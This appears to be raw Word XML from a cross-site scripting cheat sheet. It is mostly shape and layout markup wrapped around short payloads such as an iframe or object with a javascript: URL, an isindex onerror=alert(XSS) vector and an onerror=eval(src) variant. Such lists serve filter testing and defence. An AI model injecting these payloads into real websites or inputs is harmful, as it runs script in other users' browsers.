                <v:shape id="Text Box 137" o:spid="_x0000_s2204" type="#_x0000_t202" style="position:absolute;left:1930;top:1201;width:326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sDJs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sDJs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"&gt;&lt;iframe</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="77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src="javascript:alert(XSS)"&gt;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3820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1033145</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="134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676 1627"/>
                            <a:gd name="T3" fmla="*/ 1676 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1676 1627"/>
                            <a:gd name="T7" fmla="*/ 1676 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1675 1627"/>
                            <a:gd name="T11" fmla="*/ 1675 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1655 1627"/>
                            <a:gd name="T15" fmla="*/ 1655 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1648 1627"/>
                            <a:gd name="T19" fmla="*/ 1648 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1627 1627"/>
                            <a:gd name="T23" fmla="*/ 1627 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1627 1627"/>
                            <a:gd name="T27" fmla="*/ 1627 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1651 1627"/>
                            <a:gd name="T31" fmla="*/ 1651 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1655 1627"/>
                            <a:gd name="T35" fmla="*/ 1655 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1676 1627"/>
                            <a:gd name="T39" fmla="*/ 167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51E03" id="Freeform 135" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:81.35pt;width:2.45pt;height:2.45pt;z-index:-15478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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1064260;13335,1064260;11430,1063625;0,1050925;0,1046480;13335,1033145;17780,1033145;31115,1048385;31115,1050925;17780,10642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3872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986790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2021840" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="131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1840" cy="116205"/>
                          <a:chOff x="1930" y="1554"/>
                          <a:chExt cx="3184" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="132" name="Freeform 134"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1554"/>
                            <a:ext cx="3184" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5093 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 3184"/>
                              <a:gd name="T2" fmla="+- 0 1737 1554"/>
                              <a:gd name="T3" fmla="*/ 1737 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 3184"/>
                              <a:gd name="T6" fmla="+- 0 1737 1554"/>
                              <a:gd name="T7" fmla="*/ 1737 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 3184"/>
                              <a:gd name="T10" fmla="+- 0 1736 1554"/>
                              <a:gd name="T11" fmla="*/ 1736 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 3184"/>
                              <a:gd name="T14" fmla="+- 0 1715 1554"/>
                              <a:gd name="T15" fmla="*/ 1715 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 3184"/>
                              <a:gd name="T18" fmla="+- 0 1712 1554"/>
                              <a:gd name="T19" fmla="*/ 1712 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 3184"/>
                              <a:gd name="T22" fmla="+- 0 1575 1554"/>
                              <a:gd name="T23" fmla="*/ 1575 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 3184"/>
                              <a:gd name="T26" fmla="+- 0 1554 1554"/>
                              <a:gd name="T27" fmla="*/ 1554 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5093 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 3184"/>
                              <a:gd name="T30" fmla="+- 0 1554 1554"/>
                              <a:gd name="T31" fmla="*/ 1554 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5114 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 3184"/>
                              <a:gd name="T34" fmla="+- 0 1575 1554"/>
                              <a:gd name="T35" fmla="*/ 1575 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5114 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 3184"/>
                              <a:gd name="T38" fmla="+- 0 1715 1554"/>
                              <a:gd name="T39" fmla="*/ 1715 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5096 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 3184"/>
                              <a:gd name="T42" fmla="+- 0 1736 1554"/>
                              <a:gd name="T43" fmla="*/ 1736 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5093 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 3184"/>
                              <a:gd name="T46" fmla="+- 0 1737 1554"/>
                              <a:gd name="T47" fmla="*/ 173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184" h="183">
                                <a:moveTo>
                                  <a:pt x="3163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163" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3184" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3184" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3166" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3163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54"/>
                            <a:ext cx="31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&lt;object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data="javascript:alert(XSS)"&gt;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2" o:spid="_x0000_s2205" style="position:absolute;margin-left:96.5pt;margin-top:77.7pt;width:159.2pt;height:9.15pt;z-index:-15477760;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1554" coordsize="318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">
                <v:shape id="Freeform 134" o:spid="_x0000_s2206" style="position:absolute;left:1930;top:1554;width:3184;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="318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4k9ccA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBDF74V+h2UKvRTdaEEkZhVbEOqlUquItyE7&#10;+UOyszG7JvHbu0Khtxne+715k6wGU4uOWldaVjAZRyCIU6tLzhUcfjejOQjnkTXWlknBjRysls9P&#10;Ccba9vxD3d7nIoSwi1FB4X0TS+nSggy6sW2Ig5bZ1qAPa5tL3WIfwk0tp1E0kwZLDhcKbOizoLTa&#10;X02ooc9vu8xOTofz9ru7dH11nH1USr2+DOsFCE+D/zf/0V86cO9TeDwTJp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eJPXHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m3163,183l21,183r-3,-1l,161r,-3l,21,21,,3163,r21,21l3184,161r-18,21l3163,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3163,1737;21,1737;18,1736;0,1715;0,1712;0,1575;21,1554;3163,1554;3184,1575;3184,1715;3166,1736;3163,1737" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 133" o:spid="_x0000_s2207" type="#_x0000_t202" style="position:absolute;left:1930;top:1554;width:318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AFJcIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/sfwix403QVxO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YAUl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&lt;object</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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data="javascript:alert(XSS)"&gt;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3923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1249045</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="130" name="Freeform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016 1967"/>
                            <a:gd name="T3" fmla="*/ 2016 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2016 1967"/>
                            <a:gd name="T7" fmla="*/ 2016 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2015 1967"/>
                            <a:gd name="T11" fmla="*/ 2015 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1995 1967"/>
                            <a:gd name="T15" fmla="*/ 1995 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1988 1967"/>
                            <a:gd name="T19" fmla="*/ 1988 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1967 1967"/>
                            <a:gd name="T23" fmla="*/ 1967 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1967 1967"/>
                            <a:gd name="T27" fmla="*/ 1967 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1992 1967"/>
                            <a:gd name="T31" fmla="*/ 1992 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1995 1967"/>
                            <a:gd name="T35" fmla="*/ 1995 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2016 1967"/>
                            <a:gd name="T39" fmla="*/ 201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888DC" id="Freeform 131" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:98.35pt;width:2.45pt;height:2.45pt;z-index:-15477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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1280160;13335,1280160;11430,1279525;0,1266825;0,1262380;13335,1249045;17780,1249045;31115,1264920;31115,1266825;17780,12801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3974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1202690</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2453640" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="127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3640" cy="116205"/>
                          <a:chOff x="1930" y="1894"/>
                          <a:chExt cx="3864" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="128" name="Freeform 130"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1894"/>
                            <a:ext cx="3864" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5773 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 3864"/>
                              <a:gd name="T2" fmla="+- 0 2077 1894"/>
                              <a:gd name="T3" fmla="*/ 2077 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 3864"/>
                              <a:gd name="T6" fmla="+- 0 2077 1894"/>
                              <a:gd name="T7" fmla="*/ 2077 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 3864"/>
                              <a:gd name="T10" fmla="+- 0 2076 1894"/>
                              <a:gd name="T11" fmla="*/ 2076 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 3864"/>
                              <a:gd name="T14" fmla="+- 0 2056 1894"/>
                              <a:gd name="T15" fmla="*/ 2056 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 3864"/>
                              <a:gd name="T18" fmla="+- 0 2052 1894"/>
                              <a:gd name="T19" fmla="*/ 2052 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 3864"/>
                              <a:gd name="T22" fmla="+- 0 1916 1894"/>
                              <a:gd name="T23" fmla="*/ 1916 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 3864"/>
                              <a:gd name="T26" fmla="+- 0 1894 1894"/>
                              <a:gd name="T27" fmla="*/ 1894 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5773 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 3864"/>
                              <a:gd name="T30" fmla="+- 0 1894 1894"/>
                              <a:gd name="T31" fmla="*/ 1894 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5794 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 3864"/>
                              <a:gd name="T34" fmla="+- 0 1916 1894"/>
                              <a:gd name="T35" fmla="*/ 1916 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5794 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 3864"/>
                              <a:gd name="T38" fmla="+- 0 2056 1894"/>
                              <a:gd name="T39" fmla="*/ 2056 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5776 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 3864"/>
                              <a:gd name="T42" fmla="+- 0 2076 1894"/>
                              <a:gd name="T43" fmla="*/ 2076 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5773 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 3864"/>
                              <a:gd name="T46" fmla="+- 0 2077 1894"/>
                              <a:gd name="T47" fmla="*/ 207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864" h="183">
                                <a:moveTo>
                                  <a:pt x="3843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3843" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3864" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3864" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3846" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3843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894"/>
                            <a:ext cx="386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&lt;isindex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7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type=image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7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src=1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7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onerror=alert(XSS)&gt;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" o:spid="_x0000_s2208" style="position:absolute;margin-left:96.5pt;margin-top:94.7pt;width:193.2pt;height:9.15pt;z-index:-15476736;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1894" coordsize="386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">
                <v:shape id="Freeform 130" o:spid="_x0000_s2209" style="position:absolute;left:1930;top:1894;width:3864;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="386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MbpcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vDMAzF74N9B6PBLqN1Flhp07plWynsuv6D3kSs&#10;xdliOYndNvv202HQm8R7eu+nxWrwjbpQH+vABp7HGSjiMtiaKwP73WY0BRUTssUmMBn4pQir5f3d&#10;AgsbrvxJl22qlIRwLNCAS6kttI6lI49xHFpi0b5C7zHJ2lfa9niVcN/oPMsm2mPN0uCwpXdH5c/2&#10;7A10b4en0/dxdph0bk2YZ+uX7rgz5vFheJ2DSjSkm/n/+sMKfi608oxM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MbpcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m3843,183l21,183r-3,-1l,162r,-4l,22,21,,3843,r21,22l3864,162r-18,20l3843,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3843,2077;21,2077;18,2076;0,2056;0,2052;0,1916;21,1894;3843,1894;3864,1916;3864,2056;3846,2076;3843,2077" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 129" o:spid="_x0000_s2210" type="#_x0000_t202" style="position:absolute;left:1930;top:1894;width:386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GkEsMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPyxR6q5t6kCa6BikWhII0xoPHaXZM&#10;lmRn0+xq4r/vFgq9zeN9zjqfbCduNHjjWMHLPAFBXDltuFZwKt+fX0H4gKyxc0wK7uQh38we1php&#10;N3JBt2OoRQxhn6GCJoQ+k9JXDVn0c9cTR+7iBoshwqGWesAxhttOLpJkKS0ajg0N9vTWUNUer1bB&#10;9szFznwfvj6LS2HKMk34Y9kq9fQ4bVcgAk3hX/zn3us4f5HC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GkEs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&lt;isindex</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="37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type=image</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="37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src=1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="37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onerror=alert(XSS)&gt;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4025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1473200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="126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368 2320"/>
                            <a:gd name="T3" fmla="*/ 2368 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2368 2320"/>
                            <a:gd name="T7" fmla="*/ 2368 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2368 2320"/>
                            <a:gd name="T11" fmla="*/ 2368 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 2347 2320"/>
                            <a:gd name="T15" fmla="*/ 2347 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 2341 2320"/>
                            <a:gd name="T19" fmla="*/ 2341 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 2320 2320"/>
                            <a:gd name="T23" fmla="*/ 2320 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 2320 2320"/>
                            <a:gd name="T27" fmla="*/ 2320 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 2344 2320"/>
                            <a:gd name="T31" fmla="*/ 2344 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 2347 2320"/>
                            <a:gd name="T35" fmla="*/ 2347 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2368 2320"/>
                            <a:gd name="T39" fmla="*/ 2368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97579" id="Freeform 127" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:116pt;width:2.45pt;height:2.45pt;z-index:-15476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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1503680;13335,1503680;11430,1503680;0,1490345;0,1486535;13335,1473200;17780,1473200;31115,1488440;31115,1490345;17780,150368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4076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1426845</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2507615" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="123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7615" cy="116205"/>
                          <a:chOff x="1930" y="2247"/>
                          <a:chExt cx="3949" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="124" name="Freeform 126"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="2246"/>
                            <a:ext cx="3949" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5858 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 3949"/>
                              <a:gd name="T2" fmla="+- 0 2429 2247"/>
                              <a:gd name="T3" fmla="*/ 2429 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 3949"/>
                              <a:gd name="T6" fmla="+- 0 2429 2247"/>
                              <a:gd name="T7" fmla="*/ 2429 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 3949"/>
                              <a:gd name="T10" fmla="+- 0 2428 2247"/>
                              <a:gd name="T11" fmla="*/ 2428 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 3949"/>
                              <a:gd name="T14" fmla="+- 0 2408 2247"/>
                              <a:gd name="T15" fmla="*/ 2408 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 3949"/>
                              <a:gd name="T18" fmla="+- 0 2405 2247"/>
                              <a:gd name="T19" fmla="*/ 2405 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 3949"/>
                              <a:gd name="T22" fmla="+- 0 2268 2247"/>
                              <a:gd name="T23" fmla="*/ 2268 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 3949"/>
                              <a:gd name="T26" fmla="+- 0 2247 2247"/>
                              <a:gd name="T27" fmla="*/ 2247 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5858 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 3949"/>
                              <a:gd name="T30" fmla="+- 0 2247 2247"/>
                              <a:gd name="T31" fmla="*/ 2247 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5879 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 3949"/>
                              <a:gd name="T34" fmla="+- 0 2268 2247"/>
                              <a:gd name="T35" fmla="*/ 2268 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5879 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 3949"/>
                              <a:gd name="T38" fmla="+- 0 2408 2247"/>
                              <a:gd name="T39" fmla="*/ 2408 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5861 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 3949"/>
                              <a:gd name="T42" fmla="+- 0 2428 2247"/>
                              <a:gd name="T43" fmla="*/ 2428 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5858 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 3949"/>
                              <a:gd name="T46" fmla="+- 0 2429 2247"/>
                              <a:gd name="T47" fmla="*/ 242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949" h="183">
                                <a:moveTo>
                                  <a:pt x="392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928" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3949" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3949" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3931" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="392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2246"/>
                            <a:ext cx="394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7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src=x:alert(alt)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onerror=eval(src)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alt=0&gt;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" o:spid="_x0000_s2211" style="position:absolute;margin-left:96.5pt;margin-top:112.35pt;width:197.45pt;height:9.15pt;z-index:-15475712;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,2247" coordsize="394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">
                <v:shape id="Freeform 126" o:spid="_x0000_s2212" style="position:absolute;left:1930;top:2246;width:3949;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="394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m9vsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPwWrDMBBE74H+g9hCb7HsUNriWgmhEJJLDrXzAVtr&#10;a5lYK9tSY7dfHwUCve0ys/Nmi81sO3Gh0beOFWRJCoK4drrlRsGp2i3fQPiArLFzTAp+ycNm/bAo&#10;MNdu4k+6lKERMYR9jgpMCH0upa8NWfSJ64mj9u1GiyGuYyP1iFMMt51cpemLtNhyJBjs6cNQfS5/&#10;bOTK/WuWDdXXNJR+6Ab5N++OlVJPj/P2HUSgOfyb79cHHeuvnuH2TJxAr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b2+xQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3928,182l21,182r-3,-1l,161r,-3l,21,21,,3928,r21,21l3949,161r-18,20l3928,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3928,2429;21,2429;18,2428;0,2408;0,2405;0,2268;21,2247;3928,2247;3949,2268;3949,2408;3931,2428;3928,2429" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 125" o:spid="_x0000_s2213" type="#_x0000_t202" style="position:absolute;left:1930;top:2246;width:394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yuF8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yuF8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37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src=x:alert(alt)</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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onerror=eval(src)</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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alt=0&gt;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4128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1689100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="122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709 2660"/>
                            <a:gd name="T3" fmla="*/ 2709 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2709 2660"/>
                            <a:gd name="T7" fmla="*/ 2709 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2708 2660"/>
                            <a:gd name="T11" fmla="*/ 2708 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 2687 2660"/>
                            <a:gd name="T15" fmla="*/ 2687 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
